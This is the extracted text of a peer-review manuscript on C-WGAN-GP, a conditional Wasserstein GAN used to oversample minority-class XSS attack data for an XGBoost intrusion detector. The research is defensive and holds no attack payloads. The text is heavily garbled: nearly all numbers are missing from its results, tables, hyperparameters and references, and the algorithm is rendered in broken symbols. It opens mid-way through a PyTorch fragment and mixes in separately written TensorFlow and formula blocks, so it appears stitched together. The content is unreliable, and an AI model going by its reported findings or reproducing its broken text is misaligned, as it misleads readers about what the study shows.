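            layers += [nn.Linear(prev, h), nn.ReLU()]
            prev = h
        layers.append(nn.Linear(prev, 1))
        self.net = nn.Sequential(*layers)

    def forward(self, x, y):
        return self.net(torch.cat([x, y], dim=1))
```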
: for ►𝑖𝑛𝑡𝑖𝑚𝑎𝑙 𝑣𝑎𝑙𝑖𝑢𝑚𝑠 𝑐𝑟𝑖𝑡𝑖𝑐 𝑎𝑛𝑑 𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑜𝑟: : 𝑠𝑒𝑡 𝜃𝑐 = , 𝜃𝑔 = : 𝑤ℎ𝑖𝑙𝑒 𝜃 ℎ𝑎𝑠 𝑛𝑜𝑡 𝑐𝑜𝑛𝑣𝑒𝑟𝑔𝑒𝑑 𝑑𝑜 : ►𝐸𝑥𝑒𝑐𝑢𝑡𝑒 𝑛 𝑐𝑟𝑖𝑡𝑖𝑐 𝑡𝑟𝑎𝑖𝑛𝑖𝑛𝑔 𝑠𝑡𝑒𝑝𝑠 𝑓𝑜𝑟 𝑑𝑖𝑠𝑐𝑟𝑖𝑚𝑖𝑛𝑎𝑡𝑜𝑟 (𝑐𝑟𝑖𝑡𝑖𝑐 ) : 𝑓𝑜𝑟 𝑡 = ,…, 𝑛_𝑐𝑟𝑖𝑡𝑖𝑐 𝑑𝑜 : 𝑓𝑜𝑟 𝑖 = ,…, 𝑚 𝑑𝑜 : 𝑆𝑎𝑚𝑝𝑙𝑒 {(𝑥𝑖,𝑦𝑖)} 𝑚𝑖 = ~Ɗ 𝑎 𝑏𝑎𝑡𝑐ℎ 𝑜𝑓 𝑠𝑖𝑧𝑒 𝑚 𝑜𝑓 𝑟𝑒𝑎𝑙 𝑑𝑎𝑡𝑎 𝑤𝑖𝑡ℎ 𝑐𝑜𝑟𝑟𝑒𝑠𝑝𝑜𝑛𝑑𝑖𝑛𝑔 𝑙𝑎𝑏𝑒𝑙 𝑦𝑖 : 𝑆𝑎𝑚𝑝𝑙𝑖𝑛𝑔 𝑛𝑜𝑖𝑠𝑒 {(𝑧𝑖)} 𝑚𝑖 = ~𝑝𝑧(𝑧), 𝑎 𝑟𝑎𝑛𝑑𝑜𝑚 𝑛𝑢𝑚𝑏𝑒𝑟 𝜀~ 𝕌[ , ] : ►𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑒 𝑎 𝑓𝑎𝑘𝑒 𝑠𝑎𝑚𝑝𝑙𝑒𝑠 𝑋𝑖 𝑐𝑜𝑟𝑟𝑒𝑠𝑝𝑜𝑛𝑑𝑖𝑛𝑔 𝑡𝑜 𝑚𝑖 𝑟𝑒𝑎𝑙 𝑙𝑎𝑏𝑒𝑙 𝑦𝑖 : 𝑋𝑖←𝐺(𝑧𝑖|𝑦𝑖,𝜃𝑔) : ►𝐶𝑜𝑚𝑝𝑢𝑡 𝑝𝑒𝑛𝑎𝑙𝑡𝑟𝑦 𝐺𝑝 𝑎𝑛𝑑 𝑙𝑜𝑠𝑠 𝑓𝑜𝑟 𝑐𝑟𝑖𝑡𝑖𝑐 : 𝑥𝑖←𝜀𝑥𝑖 + ( ‒ 𝜀)𝑥𝑖 : 𝐺𝑝(𝜃𝑐)← 𝑚∑𝑚𝑖 = [𝑚𝑎𝑥(‖∇𝑥 �ℱ(𝑥𝑖|𝑦𝑖,𝜃𝑐)|| ‒ ) ] : 𝔼(𝜃𝑐)←∇𝜃𝑐[ 𝑚∑𝑚𝑖 = ℱ(𝑥𝑖|𝑦𝑖,𝜃𝑐) ‒ 𝑚∑𝑚𝑖 = ℱ(𝑥𝑖|𝑦𝑖,𝜃𝑐)] + 𝜆.𝐺𝑝(𝜃𝑐) : 𝑒𝑛𝑑𝑓𝑜𝑟 : 𝜃𝑐←𝐴𝑑𝑎𝑚(𝔼𝜃𝑐,𝜃𝑐,𝛼,𝛽 ,𝛽 ) : 𝑒𝑛𝑑𝑓𝑜𝑟 : ►𝐸𝑥𝑒𝑐𝑢𝑡𝑒 𝑎 𝑠𝑖𝑛𝑔𝑙𝑒 𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑜𝑟 𝐺 𝑡𝑟𝑎𝑖𝑛𝑖𝑛𝑔 𝑠𝑡𝑒𝑝 : 𝑆𝑎𝑚𝑝𝑙𝑖𝑛𝑔 {𝑦𝑖} 𝑚𝑖 = ~Ɗ 𝑎 𝑏𝑎𝑡𝑐ℎ 𝑜𝑓 𝑠𝑖𝑧𝑒 𝑚 𝑜𝑓 𝑟𝑒𝑎𝑙 𝑙𝑎𝑏𝑒𝑙 𝑦𝑖 : 𝑆𝑎𝑚𝑝𝑙𝑖𝑛𝑔 𝑛𝑜𝑖𝑠𝑒 {𝑧𝑖} 𝑚𝑖 = ~𝑝𝑧(𝑧) : ►𝐶𝑜𝑚𝑝𝑢𝑡𝑒 𝑔𝑟𝑎𝑑𝑖𝑒𝑛𝑡 𝑤𝑖𝑡ℎ 𝑟𝑒𝑠𝑝𝑒𝑐𝑡 𝑡𝑜 𝑡ℎ𝑒 𝐺 𝑝𝑎𝑟𝑎𝑚𝑒𝑡𝑒𝑟𝑠 : 𝔼(𝜃𝑔)←∇𝜃𝑔[ 𝑚∑𝑚𝑖 = ℱ(𝑔(𝑧𝑖|𝑦𝑖,𝜃𝑔)|𝑦𝑖,𝜃𝑐) : 𝜃𝑔←𝐴𝑑𝑎𝑚( ‒ 𝔼𝜃𝑔,𝜃𝑐,𝛼,𝛽 ,𝛽 ) : 𝑒𝑛𝑑 𝑤ℎ𝑖𝑙𝑒 : 𝑙𝑜𝑎𝑑 𝑡ℎ𝑒 𝑏𝑒𝑠𝑡 𝑠𝑡𝑒𝑝 𝑤𝑒𝑖𝑔ℎ𝑡 𝑓𝑜𝑟 𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑖𝑣𝑒 𝑛𝑒𝑡 : 𝑑𝑎𝑡𝑎_ 𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑒𝑑 [ ] : 𝑤ℎ𝑖𝑙𝑒 𝜃 ℎ𝑎𝑠 𝑐𝑜𝑛𝑣𝑒𝑟𝑔𝑒𝑑 𝑑𝑜 ►𝑔𝑒𝑛𝑒𝑟𝑎𝑡 𝑋𝑖 𝑠𝑎𝑚𝑝𝑙𝑒𝑠 : for each 𝑠𝑎𝑚𝑝𝑙𝑒 𝑋𝑖 𝑐𝑜𝑟𝑟𝑒𝑠𝑝𝑜𝑛𝑑𝑖𝑛𝑔 𝑡𝑜 𝑟𝑒𝑎𝑙 𝑙𝑎𝑏𝑒𝑙 𝑦𝑖 𝑑𝑜 : 𝑖𝑓 𝑋𝑖 𝑠𝑎𝑡𝑖𝑠𝑓𝑦 𝑡ℎ𝑒 𝑐𝑟𝑖𝑡𝑖𝑐 𝑡ℎ𝑒𝑛 : 𝑑𝑎𝑡𝑎_𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑒𝑑.𝑎𝑝𝑝𝑒𝑛𝑑 [𝑋𝑖] : 𝑒𝑛𝑑 𝑓𝑜𝑟 : 𝑒𝑛𝑑 𝑤ℎ𝑖𝑙𝑒 : 𝐽𝑜𝑖𝑛 𝑑𝑎𝑡𝑎_𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑒𝑑 𝑋𝑖 𝑡𝑜 𝑡ℎ𝑒 𝑑𝑎𝑡𝑎𝑠𝑒𝑡 𝑥𝑖 : 𝑡𝑟𝑒𝑎𝑡𝑖𝑛𝑔 𝑎 𝑛𝑒𝑤 𝑋𝐺𝐵𝑜𝑜𝑠𝑡 𝑚𝑜𝑑𝑒𝑙 peerj comput. sci. reviewing pdf | (cs- : : : : :new oct ) manuscript to be reviewedcomputer science experimental methodology this study proposed generative model c-wgan-gp, an oversampling solution of minority class to solve unbalanced xss attack data. we trained the detector (xgboost) using the real training dataset and test it using the test dataset before without augmented data, and then the results were recorded for comparison. subsequently, we trained each of the gans models using real training dataset to generate synthetic data. we repeated the training of the detector using the augmented data and test it using the test dataset. the results of each model were recorded for comparison. similarly, traditional oversampling methods were trained and tested. the c-wgan-gp generator performance was evaluated in two directions. first, we assessed the performance of the c-wgan-gp generative adversarial network against the mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. other four gans. second, we compared our c-wgan-gp model with two traditional oversampling methods include smote (han, wang & mao, ) and adaptive synthetic (adasyn) (bunkhumpornpat, sinapiromsaran & lursinsap, ). the systemic flowchart of the proposal is shown in fig. . detector we use an external model to evaluate the quality of the data generated by our proposed method and other methods. the xgboost boosting model was used for all experiments to assess the augmented data’s quality on xss attack detection performance. the xgboost is a state-of-the-art boosting algorithm that is simple to apply and interpret, is highly efficient, does not require advanced data preparation, and has many advanced functions (chen & guestrin, ). the algorithm’s learning rate, tree size, and tree number hyperparameters tuned to . , , and , respectively. datasets to our knowledge, there is only one public dataset for intrusion detection that includes xss attacks that we were able to find called cicids designed by the canadian institute of cybersecurity (sharafaldin, habibilashkari & ghorbani, ). the released cicids dataset contains features that include regular traffic and recent common attacks. 
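To make the training procedure in the algorithm above concrete (n_critic critic updates using the gradient penalty on interpolated samples, followed by a single generator update), a minimal TensorFlow sketch of the two update steps is given below. The layer sizes, data dimensions, penalty coefficient, and other numeric values are placeholders rather than the settings used in the paper, and the function names are illustrative, not taken from the original code.

```python
# Minimal sketch of the C-WGAN-GP update steps (placeholder dimensions and
# hyperparameters; the conditioning label y is concatenated to both networks' inputs).
import tensorflow as tf

NOISE_DIM, COND_DIM, DATA_DIM = 32, 1, 77   # placeholder sizes
LAMBDA_GP = 10.0                            # gradient-penalty coefficient (placeholder)

def make_generator():
    # Conditional generator G(z|y): (noise, label) -> synthetic feature vector.
    return tf.keras.Sequential([
        tf.keras.layers.Dense(128, activation="relu",
                              input_shape=(NOISE_DIM + COND_DIM,)),
        tf.keras.layers.Dense(256, activation="relu"),
        tf.keras.layers.Dense(DATA_DIM),  # linear output (placeholder choice)
    ])

def make_critic():
    # Conditional critic D(x|y): (sample, label) -> unbounded score (no sigmoid).
    return tf.keras.Sequential([
        tf.keras.layers.Dense(256, activation="relu",
                              input_shape=(DATA_DIM + COND_DIM,)),
        tf.keras.layers.Dense(128, activation="relu"),
        tf.keras.layers.Dense(1),
    ])

def gradient_penalty(critic, real, fake, labels):
    # x_hat = eps*x + (1-eps)*x_tilde; penalize (||grad_{x_hat} D(x_hat|y)||_2 - 1)^2.
    eps = tf.random.uniform([tf.shape(real)[0], 1], 0.0, 1.0)
    x_hat = eps * real + (1.0 - eps) * fake
    with tf.GradientTape() as tape:
        tape.watch(x_hat)
        score = critic(tf.concat([x_hat, labels], axis=1))
    grads = tape.gradient(score, x_hat)
    norm = tf.sqrt(tf.reduce_sum(tf.square(grads), axis=1) + 1e-12)
    return tf.reduce_mean(tf.square(norm - 1.0))

def critic_step(gen, critic, c_opt, real, labels, noise):
    # One of the n_critic updates: minimize E[D(fake|y)] - E[D(real|y)] + lambda*GP.
    with tf.GradientTape() as tape:
        fake = gen(tf.concat([noise, labels], axis=1))
        loss = (tf.reduce_mean(critic(tf.concat([fake, labels], axis=1)))
                - tf.reduce_mean(critic(tf.concat([real, labels], axis=1)))
                + LAMBDA_GP * gradient_penalty(critic, real, fake, labels))
    c_opt.apply_gradients(zip(tape.gradient(loss, critic.trainable_variables),
                              critic.trainable_variables))
    return loss

def generator_step(gen, critic, g_opt, labels, noise):
    # Single generator update: minimize -E[D(G(z|y)|y)].
    with tf.GradientTape() as tape:
        fake = gen(tf.concat([noise, labels], axis=1))
        loss = -tf.reduce_mean(critic(tf.concat([fake, labels], axis=1)))
    g_opt.apply_gradients(zip(tape.gradient(loss, gen.trainable_variables),
                              gen.trainable_variables))
    return loss
```

In an outer loop, critic_step is called n_critic times for every call to generator_step, both driven by Adam optimizers; after training, only generated samples that satisfy the critic are appended to the real training data, as in the algorithm above.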
to provide attack features, we used a cicflowmeter tool to extract features from pcaps files and used selenium with damn vulnerable web application to run automatic xss attacks. however, there are only xss attacks traffic, and over , regular traffic, making it a highly unbalanced dataset. we have added another dataset proposed in our previous work (mokbal et al., ). the dataset includes features with labels that are categorized based on three groups, including html, javascript, and url. we extracted , xss attack samples and , benign samples as a second dataset. we applied data preprocessing to each dataset. in both datasets, all samples have two classes, xss attack and benign, which are set to [ , ], respectively. the two datasets were split randomly into training and test sets with a % and % ratio, respectively, where data augmentation was performed only on the training dataset. missing and infinite values in cicids were updated using their features’ mean values, whereas the zero features and duplicate rows were omitted. the number of features with clean data in the cicids dataset is , and the number of features with clean data in the second dataset is . subsequently, the data’s scale within the range [ , ] was applied using the minimax function for both datasets. the class-level distribution of datasets is shown in table . the datasets are available at https://doi.org/ . /m .figshare. .v . performance evaluation criteria although many performance metrics have been introduced, gans do not have an objective measure of the generator model, as there is no consensus on the best metric that captures the strength/limitations of the model and should be used for a fair comparison between models (borji, ). we used precision, detectionrate(dr)/ recall, and f −score, which are proven and widely adopted methods for quantitatively estimating the quality of discriminative mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . /peerj-cs. unbalanced dataset testing data training data min max scaling preprocessing classifier training augmented data result benign attack -fold cross validation (cv) append the sample generated jointed real and generated data critic (d) generator (g) accepted no yes fine-tuning training a tt a ck c la ss n o is e r e a l tr a in in g d a ta c-wgan-gp xgboost figure systemic flowchart of c-wgan-gp. full-size doi: . /peerjcs. /fig- table the class-level distribution of the datasets. id dataset #samples #attributes minority class majority class #minority samples #majority samples cicids (sharafaldin, habibilashkari & ghorbani, ) , attack benign , mlpxss (mokbal et al., ) , attack benign , models suggested by google brain research (lucic et al., ). precision measures the generated instances similarity to the real ones on average. whenever the instances generated are similar to the real instances, the precision is high. in gans, the recall (detection rate) measures diversity. a high recall indicates the generator can generate any instances found in the training dataset. for cybersecurity detection sys, the recall/detection rate denotes the ability of sys to detect the real attacks. the f-score reflects the harmonic mean of precision and recall. further, the area under the curve (auc) measure that demonstrates a detector’s ability to distinguish between classes and summarizes the detector’s performance is also collected. the measurements are defined as follows. 
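In standard notation, with TP, FP, TN, and FN denoting true/false positives and negatives, these measures take the usual forms (the F-score as the harmonic mean of precision and recall, and the AUC written in the balanced sensitivity/specificity form used here):

```latex
\begin{align}
\mathrm{Precision} &= \frac{TP}{TP + FP} &
\mathrm{DR\ (Recall)} &= \frac{TP}{TP + FN} \\
F\text{-}score &= \frac{2\cdot\mathrm{Recall}\cdot\mathrm{Precision}}
                       {\mathrm{Recall} + \mathrm{Precision}} &
\mathrm{AUC} &= \frac{1}{2}\left(\frac{TP}{TP + FN} + \frac{TN}{TN + FP}\right)
\end{align}
```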
precision= tp (tp+fp) ( ) dr= tp (tp+fn) ( ) mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. f−score= ( (recall×precision) (recall+precision) ) ( ) auc = ( tp tp+fn + tn tn +fp ) ( ) results and discussion the c-wgan-gp-based data augmentation approach was implemented in python . using the tensorflow framework on linux operating system. the proposed method was implemented alongside four other gan-based generative methods and two traditional generative methods (smote and adasyn). all the methods were validated using -fold cross-validation. to demonstrate how the attack dr decreased as the gap between normal and malicious classes increased, we injected different ratios of the majority class in the training data to train the xgboost detector model using auc and dr criteria. the model tested on the fixed test dataset size of % each time. during the attack detection test, the results show that dr decreased from . % with an injected ratio of % of the majority class to approximately . % with an injected ratio of % of the majority class. these results are shown in table . using our generative approach, we injected the generated data into a real training dataset to create a new augmented training dataset. the augmented data were used to train the xss attack detector, which is different from the generative framework to judge the data quality. the detector was tested using the real test dataset. this experiment mechanism was applied to all of the methods we used, and results were reported for each scenario. the average results reported in each trial on the cicids dataset are shown in table (sharafaldin, habibilashkari & ghorbani, ). using the same mechanism, we repeated the experiments using the dataset extracted from our previous work (mokbal et al., ), and the results are shown in table . notably, using augmented data generated by the proposed method significantly improved the xss attacks detection compared with state-of-the-art baseline methods. the results in tables and show that the dr increased up to . % in the cicids dataset and up to . % in the second dataset. that is, our generative model able to generate any sample found in the xss attack training dataset. the precision measure is also high, which equals . on the first dataset and . on the second dataset. the precision results imply that the proposed generative model generated samples look similar to the real xss attack samples on average. concerning f-score, the proposed generative model was superior to other generative methods. it achieved the result score of . in the first data set and the score of . in the second dataset. the auc measure of the proposed generative model is also continued to be outperformed the other methods in both datasets with a significant margin. mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the collapse of the detection rate as the unbalanced classes’ gap increased. ratio train-auc mean train-auc std train-recall mean train-recall std test-auc mean test-auc std test-recall mean test-recall std % . . . . . . . . % . . . . . . . . % . . . . . . . . % . . . . . . . . % . . . . . . . . table detection results using data augmented generated through different methods on the cicids dataset. criteria none adasyn smote gan cgan wgan wgan-gp c-wgan-gp dr (sensitivity) . . . . . . . . specificity . . . . . . . . precision . . . . . . . . f-score . . . . . . . . 
auc . . . . . . . . table detection results using data augmented generated through different methods on the second dataset. criteria none adasyn smote gan cgan wgan wgan-gp c-wgan-gp dr (sensitivity) . . . . . . . . specificity . . . . . . . . precision . . . . . . . . f-score . . . . . . . . auc . . . . . . . . the results for adasyn, wgan-gp, wgan, smote, and cgan showed improved dr performance, respectively, with varying proportions. the effects of the additional samples on the xss attack dr under the condition of acceptance by the discriminator on the cicids dataset are shown in fig. along with standard deviation. the standard deviation of the c-wgan-gp is overall small compared to other methods; it also decreases as training steps increase. while the standard deviation of cgan and wgan is not smooth and shows more variation. the standard deviation of wgan-gp was smoother than gan and wgan but less smooth and more varied than c-wgan-gp. this fact indicates the stability of c-wgan-gp training to some extent. the results suggest that the c-wgan-gp significantly outperformed cgan, wgan and wgan-gp. the superiority of the c-wgan-gp over the rest of the gans is due to the fact that the model is enhanced with the characteristics of two generative networks, cgan and wgan- gp. the c-wgan-gp used minority class labels that act as an extension to the latent space z to generate and discriminate instances well, which inspired from cgan. consequently, the model can learn a multi-modes mapping from inputs to outputs by feeding it with different contextual auxiliary information. the c-wgan-gp optimized using wasserstein distance with gradient penalty inspired by wgan-gp. the training process is more stable mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure effects of the data augmentation on the xss attack detection rate over the baseline for gan, wgan, wgan-gp, and c-wgan-gp. (a) cgan detection rate, (b) wgan detection rate, (c) wgan-gp detection rate, and (d) c-wgan-gp detection rate. the red horizontal dashed line indicates the baseline estimate of each generative model. full-size doi: . /peerjcs. /fig- and less sensitive to model design and configurations of hyperparameter. further, the loss of the critic is related to the quality of instances created by the generator. precisely, the lower the critic’s loss when evaluating the instances generated, the higher the expected quality of the instances generated. this criterion is crucial because unlike other gans that seek stability by finding a balance between two models, wgan seeks convergence and minimizes generator loss. furthermore, adding the generated samples of cgan, wgan, and wgan-gp that satisfied the discriminator’s acceptance condition (critic) adds value to the augmented training dataset, which increases detector ability and efficiency. the loss of generated data for c-wgan-gp compared with that of the other four gan methods is shown in fig. . it is quite clear that the loss curve of c-wgan-gp decreased regularly and continuously compared to all other generative methods. the loss curves of gan and cgan are unstable, and the models went to collapse mode during the generating phase. the wgan and wgan–gp loss curves decreased regularly; however, it is high compared with c-wgan-gp. note that gan and cgan are using js divergence, whereas wgan and c-wan-gp are using the wasserstein distance or emd. 
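As a concrete illustration of the evaluation mechanism described above — train the XGBoost detector on the real training data joined with the critic-approved generated samples, then score it on the untouched real test set — a minimal sketch follows. The hyperparameter values are placeholders rather than the paper's tuned settings, and the helper name is illustrative.

```python
# Sketch of the detector-side evaluation on augmented data (placeholder hyperparameters).
import numpy as np
import xgboost as xgb
from sklearn.metrics import confusion_matrix, f1_score, precision_score, recall_score

def evaluate_augmentation(x_train, y_train, x_gen, y_gen, x_test, y_test):
    # Generated samples are appended to the training split only; the test split stays real.
    x_aug = np.vstack([x_train, x_gen])
    y_aug = np.concatenate([y_train, y_gen])

    clf = xgb.XGBClassifier(learning_rate=0.1, max_depth=6, n_estimators=300)  # placeholders
    clf.fit(x_aug, y_aug)

    y_pred = clf.predict(x_test)
    tn, fp, fn, tp = confusion_matrix(y_test, y_pred).ravel()
    return {
        "precision": precision_score(y_test, y_pred),
        "dr_recall": recall_score(y_test, y_pred),
        "f_score": f1_score(y_test, y_pred),
        "specificity": tn / (tn + fp),
        "auc_balanced": 0.5 * (tp / (tp + fn) + tn / (tn + fp)),  # balanced form from above
    }
```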
similarly, in the loss curve of real data, the gan and cgan face difficulty learning the training data distribution. in contrast, the wgan and wgan–gp losses decreased regularly; however, it is high compared with c-wgan-gp. the c-wgan-gp seems to learn the training data distribution better than all other generative methods, as shown in fig. . to estimate the proposed method’s generalization ability, we investigated the wasserstein critic, in which the distance between actual and generated data losses is calculated. this estimate demonstrates how much the data generated by the proposed model and real data are identical. the difference in distance between the real and generated data distribution of wgan, wgan-gp, and c-wgan-gp that generative models learn to minimize is shown in fig. . the distance between generated and real data of c-wgan-gp is close to zero. that is, the c-wgan-gp generated samples that are identical to real data distribution; further, the training stability of the proposed generative model is adequate. for further clarification, the xgboost classification accuracy trained on the five different generative methods’ data is shown in fig. . the xgboost accuracy curve of c-wgan-gp data is higher than that of other models, which indicates the quality of the data generated mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. training step . . . . . . g en er at ed l os se s gan cgan wgan wgan_gp c_wgan_gp figure the loss of generated data. full-size doi: . /peerjcs. /fig- training step . . . . . . . . r ea l l os se s gan cgan wgan wgan_gp c_wgan_gp figure the loss of real data. full-size doi: . /peerjcs. /fig- by the proposed model. figure shows a general visualization example of the data quality generated by c-wgan-gp compared with other generative methods and displays the collapse mode of gan and cgan between and of training steps in the second dataset. in addition to the beginning of the gradient extinction of wgan at of training steps. conclusions this study proposed a conditional critic neural network with a gradient penalty called c- wgan-gp to improve the xss attack detection on unbalanced datasets. the c-wgan-gp mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. training step . . . . g en er at ed - a ct ua l c rit ic l os s wgan wgan_gp c_wgan_gp figure difference between critic (em distance estimate) loss on generated and real samples. full-size doi: . /peerjcs. /fig- training step . . . . . . . x g b bo os t a cc ur ac y gan cgan wgan wgan_gp c_wgan_gp figure the detector loss function over various generated data. full-size doi: . /peerjcs. /fig- is trained to approximate the em distance with an auxiliary of minority class for control mode to generate valid and reliable synthetic samples with identical distribution to real xss attack scenarios. we trained a new boosting model using the augmented dataset to improve the xss attack detection system and mitigate an unbalanced dataset problem. we conducted experiments to compare the proposed method with gan, cgan, wgan, wgan-gp, smote, and adasyn using two real-world xss attack datasets. experimental results show that the proposed method can train a generator model with improved training stability. 
the proposed method enhanced the detection of xss attacks and prevented the adversarial examples that have been widely used to target ai cyber defense systems. furthermore, the c-wgan-gp method can be extended to other forms of attacks and to other fields, including the medical field, where datasets are highly unbalanced. for future work, we will investigate network training stability to generate data using various designs over different network architectures. it is a significant problem worthy of further research.

additional information and declarations

funding
the authors received no funding for this work.

competing interests
the authors declare there are no competing interests.

author contributions
• fawaz mahiuob mohammed mokbal conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
• dan wang conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, supervised the work, and approved the final draft.
• xiaoxi wang analyzed the data, performed the computation work, prepared figures and/or tables, and approved the final draft.
• lihua fu analyzed the data, authored or reviewed drafts of the paper, and approved the final draft.

data deposition
the following information was supplied regarding data availability:
all raw data are available as supplemental files.
additional data are available at figshare: mokbal, fawaz ( ): cross-site scripting attack (xss) dataset. figshare. dataset. https://doi.org/ . /m .figshare. .v . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references andreeva o, gordeychik s, gritsai g, kochetova o, potseluevskaya e, sidorov si, timorin aa. . industrial control systems vulnerabilities statistics. kaspersky lab, report doi . /rg. . . . . arjovsky m, chintala s, bottou l. . wasserstein generative adversarial networks. in: th international conference on machine learning, icml , vol. . – . borji a. . pros and cons of gan evaluation measures. computer vision and image understanding : – doi . /j.cviu. . . . buda m, maki a, mazurowski ma. . a systematic study of the class imbalance problem in convolutional neural networks. neural networks : – doi . /j.neunet. . . . bunkhumpornpat c, sinapiromsaran k, lursinsap c. . dbsmote: density- based synthetic minority over-sampling technique. applied intelligence : – doi . /s - - -y. chen t, guestrin c. . xgboost: a scalable tree boosting system. in: proceedings of the nd acm sigkdd international conference on knowledge discovery and data mining - kdd ’ . new york: acm press, – doi . / . . deepa g, thilagam ps. . securing web applications from injection and logic vulnerabilities: approaches and challenges. information and software technology : – doi . /j.infsof. . . . douzas g, bacao f. . effective data generation for imbalanced learning using conditional generative adversarial networks. expert systems with applications : – doi . /j.eswa. . . . mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /rg. . . . http://dx.doi.org/ . /j.cviu. . . http://dx.doi.org/ . /j.neunet. . . http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . / . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /peerj-cs. elkan c. . the foundations of cost-sensitive learning. in: ijcai international joint conference on artificial intelligence. – . goodfellow ij, pouget-abadie j, mirza m, xu b, warde-farley d, ozair s, courville a, bengio y. . generative adversarial nets. advances in neural information processing systems : – . gulrajani i, ahmed f, arjovsky m, dumoulin v, courville a. . improved training of wasserstein gans. in: advances in neural information processing systems - december. – . haixiang g, yijing l, shang j, mingyun g, yuanyue h, bing g. . learning from class-imbalanced data: review of methods and applications. expert systems with applications : – doi . /j.eswa. . . . han h, wang wy, mao bh. . borderline-smote: a new over-sampling method in imbalanced data sets learning. in: international conference on intelligent computing. berlin, heidelberg: springer, – . he h, bai y, garcia ea, li s. . adasyn: adaptive synthetic sampling approach for imbalanced learning. in: proceedings of the international joint conference on neural networks. – doi . /ijcnn. . . kovács b, tinya f, németh c, Ódor p. . smote: synthetic minority over-sampling technique nitesh. ecological applications : – doi . /eap. . lekies s, kotowicz k, grob s, nava eav, johns m. . code-reuse attacks for theweb: breaking cross-site scripting mitigations via script gadgets. 
in: proceedings of the acm conference on computer and communications security. new york: acm press, – doi . / . . lópez v, fernández a, garcía s, palade v, herrera f. . an insight into classification with imbalanced data: empirical results and current trends on using data intrinsic characteristics. information sciences : – doi . /j.ins. . . . lucic m, kurach k, michalski m, bousquet o, gelly s. . are gans created equal? a large-scale study. in: advances in neural information processing systems - december. – . mirza m, osindero s. . conditional generative adversarial nets. arxiv preprint. arxiv: . . mitropoulos d, spinellis d. . fatal injection: a survey of modern code injection attack countermeasures. peerj computer science :e doi . /peerj-cs. . mokbal fmm, dan w, imran a, jiuchuan l, akhtar f, xiaoxi w. . mlpxss: an integrated xss-based attack detection scheme in web applications using multilayer perceptron technique. ieee access : – doi . /access. . . national institute of standards and technology. . national vulnerability database (nvd), vulnerabilities. available at https://nvd.nist.gov/vuln. nunan ae, souto e, dossantos em, feitosa e. . automatic classification of cross- site scripting in web pages using document-based and url-based features. in: ieee symposium on computers and communications (iscc). piscataway: ieee, – doi . /iscc. . . mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /ijcnn. . http://dx.doi.org/ . /eap. http://dx.doi.org/ . / . http://dx.doi.org/ . /j.ins. . . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /access. . https://nvd.nist.gov/vuln http://dx.doi.org/ . /iscc. . http://dx.doi.org/ . /peerj-cs. obimbo c, ali k, mohamed k. . using ids to prevent xss attacks. in: int’ l conf. security and management. – . pan z, yu w, yi x, khan a, yuan f, zheng y. . recent progress on gener- ative adversarial networks (gans): a survey. ieee access : – doi . /access. . . precise security. . cross-site scripting (xss) makes nearly % of all cyber attacks in - precisesecurity.com. available at https://www.precisesecurity.com/articles/ cross-site-scripting-xss-makes-nearly- -of-all-cyber-attacks-in- / (accessed on february ). rathore s, sharma pk, park jh. . xssclassifier: an efficient xss attack detection approach based on machine learning classifier on snss. journal of information processing systems : – doi . /jips. . . sarmah u, bhattacharyya dk, kalita jk. . a survey of detection methods for xss attacks. journal of network and computer applications : – doi . /j.jnca. . . . sharafaldin i, habibilashkari a, ghorbani aa. . toward generating a new intrusion detection dataset and intrusion traffic characterization. in: proceedings of the th international conference on information systems security and privacy - volume : icissp. – doi . / . villani c. . optimal transport, old and new. berlin: springer berlin heidelberg doi . / - - - - . vluymans s. . learning from imbalanced data. studies in computational intelligence : – doi . / - - - - _ . wang y, cai w, wei p. . a deep learning approach for detecting malicious javascript code. security and communication networks : – doi . /sec. . wang r, jia x, li q, zhang s. . machine learning based cross-site scripting detection in online social network. 
